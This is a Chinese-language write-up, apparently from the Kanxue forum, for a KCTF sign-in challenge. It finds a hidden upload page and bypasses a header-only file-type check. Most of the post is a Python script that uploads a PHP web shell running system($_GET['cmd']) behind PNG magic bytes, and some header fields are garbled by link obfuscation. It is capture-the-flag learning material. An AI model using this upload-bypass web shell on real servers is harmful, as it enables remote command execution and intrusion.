[原创]KCTF 签到题逐光启航 WriteUP-CTF对抗-看雪-安全社区|安全招聘|kanxue.com

[原创]KCTF 签到题逐光启航 WriteUP

发表于: 2024-8-21 16:10 1625

[原创]KCTF 签到题逐光启航 WriteUP

tacesrever 活跃值

2024-8-21 16:10

1625

查看题目主页可以找到hint.php的链接;
查看hint.php的网页源代码可以发现base64编码的 hidden_page.php
访问发现为上传页面, 上传文件提示只接受.jpg .png文件
测试发现对上传文件的格式检测基于文件头且不限制后缀, 可以构造php文件上传

def sendraw(host, port, data, tls=False):
    import ssl, socket
    from http.client import HTTPResponse
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host,port))
    if tls:
        s = ssl.wrap_socket(s)
    if isinstance(data, str):
        data = data.encode('latin-1')
    s.sendall(data)
    resp = HTTPResponse(s)
    resp.begin()
    res = resp.read()
    s.close()
    return res
 
header_part1 = b'POST /hidden_page.php HTTP/1.1\r\nHost: 0bfdcec0-7c78-45ba-a7b9-1c58ac076038.node.pediy.com:81\r\nContent-Length: '
header_part2 = b'\r\nCache-Control: max-age=0\r\nUpgrade-Insecure-Requests: 1\r\nOrigin: c91K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0m8T1k6X3c8U0k6h3x3H3i4K6u0V1y4$3x3%4z5q4)9J5k6o6b7#2j5X3q4Q4x3X3c8S2y4$3t1&6i4K6u0V1x3h3x3#2z5r3q4U0x3o6M7$3x3o6x3^5i4K6u0W2L8X3!0V1k6g2)9J5k6i4m8W2k6r3W2&6i4K6u0W2j5$3!0E0i4K6y4m8z5o6q4Q4y4f1y4J5i4K6g2o6L8V1y4G2L8Y4c8W2L8Y4c8Q4x3X3c8f1P5i4m8W2i4K6y4m8 multipart/form-data; boundary=----WebKitFormBoundarydhHx9Ablqmk1ZA7n\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\r\nReferer: 36bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0m8T1k6X3c8U0k6h3x3H3i4K6u0V1y4$3x3%4z5q4)9J5k6o6b7#2j5X3q4Q4x3X3c8S2y4$3t1&6i4K6u0V1x3h3x3#2z5r3q4U0x3o6M7$3x3o6x3^5i4K6u0W2L8X3!0V1k6g2)9J5k6i4m8W2k6r3W2&6i4K6u0W2j5$3!0E0i4K6y4m8z5o6q4Q4x3V1k6Z5K9h3c8V1k6h3&6Q4y4h3k6H3j5h3N6W2i4K6u0W2M7r3S2H3i4K6g2o6M7W2)9#2b7$3&6m8j5$3y4W2M7s2c8Q4x3X3c8q4L8X3y4G2k6r3W2F1k6#2)9K6b7b7`.`. gzip, deflate\r\nAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7\r\nConnection: close\r\n\r\n'
 
data_part1 = b'------WebKitFormBoundarydhHx9Ablqmk1ZA7n\r\nContent-Disposition: form-data; name="upload_file"; filename="test.php"\r\nContent-Type: image/png\r\n\r\n'
 
data_part2 = b'\r\n------WebKitFormBoundarydhHx9Ablqmk1ZA7n\r\nContent-Disposition: form-data; name="submit"\r\n\r\n\xe4\xb8\x8a\xe4\xbc\xa0\r\n------WebKitFormBoundarydhHx9Ablqmk1ZA7n--\r\n'
 
data = open('anypic.png', 'rb').read()[:8] + b'<?php system($_GET[\'cmd\']); ?>'
 
data = data_part1 + data + data_part2
payload = header_part1 + str(len(data)).encode('latin1') + header_part2 + data
 
r = sendraw('123.57.66.184', 81, payload)